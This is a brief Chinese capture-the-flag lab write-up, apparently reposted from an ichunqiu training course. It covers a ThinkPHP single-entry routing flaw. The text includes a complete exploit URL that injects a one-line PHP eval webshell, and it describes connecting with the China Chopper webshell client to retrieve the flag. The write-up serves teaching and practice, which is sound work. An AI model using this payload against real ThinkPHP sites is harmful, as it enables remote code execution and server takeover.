ichunqiu--竞赛训练营--框架漏洞
Posted imanoob
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ichunqiu--竞赛训练营--框架漏洞相关的知识,希望对你有一定的参考价值。
实验环境:winxp
工具:菜刀
目的:获取www.test.ichunqiu的flag
根据提示下载web.exe,下载后解压看到thinkphp框架
这个实验室利用thinkphp的单一入口漏洞
url请求需要经过index.php来进行分发,然后由内部过滤器来获取到传递的参数,如果没有进行过滤就能远程命令执行
直接插入一句话木马http://www.test.ichunqiu/index.php/module/action/param1/{${eval($_POST[1])}}
返回了一个错误页面,直接用菜刀连接拿到flag
以上是关于ichunqiu--竞赛训练营--框架漏洞的主要内容,如果未能解决你的问题,请参考以下文章